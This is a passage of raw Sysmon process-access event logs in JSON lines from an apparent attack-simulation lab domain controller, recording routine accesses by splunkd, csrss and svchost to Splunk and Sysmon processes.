{"EventTime":"2020-08-01 05:50:50","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4069,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:50:50.914\r\nSourceProcessGUID: {A837DB8D-0239-5F25-0000-001064190500}\r\nSourceProcessId: 2868\r\nSourceThreadId: 2168\r\nSourceImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nTargetProcessGUID: {A837DB8D-02BA-5F25-0000-0010890B0600}\r\nTargetProcessId: 4412\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-admon.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+ce6a3b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17cade|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18641d|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17ef16|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c992c4|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18689b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+189d3c|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c95f5f|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c99fad|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+184c5b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c7dd7e|C:\\Windows\\System32\\ucrtbase.dll+1fb80|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:50:50.914","SourceProcessGUID":"{A837DB8D-0239-5F25-0000-001064190500}","SourceProcessId":"2868","SourceThreadId":"2168","SourceImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","TargetProcessGUID":"{A837DB8D-02BA-5F25-0000-0010890B0600}","TargetProcessId":"4412","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-admon.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+ce6a3b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17cade|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18641d|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17ef16|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c992c4|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18689b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+189d3c|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c95f5f|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c99fad|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+184c5b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c7dd7e|C:\\Windows\\System32\\ucrtbase.dll+1fb80|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:50:51","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:50:50","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4070,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:50:50.914\r\nSourceProcessGUID: {A837DB8D-01B3-5F25-0000-0010D8420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 808\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {A837DB8D-02BA-5F25-0000-0010890B0600}\r\nTargetProcessId: 4412\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-admon.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:50:50.914","SourceProcessGUID":"{A837DB8D-01B3-5F25-0000-0010D8420000}","SourceProcessId":"648","SourceThreadId":"808","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{A837DB8D-02BA-5F25-0000-0010890B0600}","TargetProcessId":"4412","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-admon.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 05:50:51","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:50:50","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4071,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:50:50.914\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:50:50.914","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:50:51","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:50:50","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4072,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:50:50.914\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:50:50.914","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:50:51","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:50:50","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4073,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:50:50.914\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:50:50.914","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:50:51","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:50:50","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4074,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:50:50.914\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:50:50.914","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:50:51","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:50:50","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4075,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:50:50.914\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:50:50.914","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:50:51","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:50:50","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4076,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:50:50.914\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:50:50.914","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:50:51","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:50:50","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4077,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:50:50.914\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: 